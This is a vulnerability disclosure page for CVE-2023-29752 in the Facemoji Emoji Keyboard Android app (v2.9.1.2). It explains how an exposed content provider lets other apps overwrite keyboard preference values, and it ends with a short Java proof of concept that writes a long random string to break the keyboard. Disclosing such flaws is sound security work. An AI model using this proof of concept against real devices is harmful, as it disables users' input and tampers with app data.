CVE-2023-29752: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

Escalation of Privileges exists in Facemoji Emoji Keyboard（CVE-2023-29752）

Vendor: EKATOX APPS(https://www.facemojikeyboard.com/)

Affected product: Facemoji Emoji Keyboard(com.simejikeyboard)

Version: 2.9.1.2

Download link：https://play.google.com/store/apps/details?id=com.simejikeyboard

Description of the vulnerability for use in the CVE：An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.

Additional information: The Facemoji Emoji Keyboard application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application launch and affects critical application functionality. Specifically, an attacker is able to modify the data in the profile_enable_subtype.xml file by constructing an intent carrying malicious data. When the key_enable_subtype field is modified to an arbitrary string, the virtual keyboard that comes with this application will not be able to output any characters. More seriously, when the key_enable_subtype and key_subtype_enable_layout fields are modified to any string at the same time, the virtual keyboard will not pop up when any input box is clicked, and the application will keep reporting errors, leading to escalation of privilege attacks.

poc:

public void attack_keybord(){ ContentResolver contentResolver = getApplicationContext().getContentResolver(); Uri uri = Uri.parse(“content://com.simejikeyboard.dprefrenceprovider/string/profile_enable_subtype/xxx”); ContentValues contentValues = new ContentValues(); String randomString = getRandomString(10240); contentValues.put(“key","key_enable_subtype”); contentValues.put("value",randomString); contentResolver.insert(uri,contentValues); }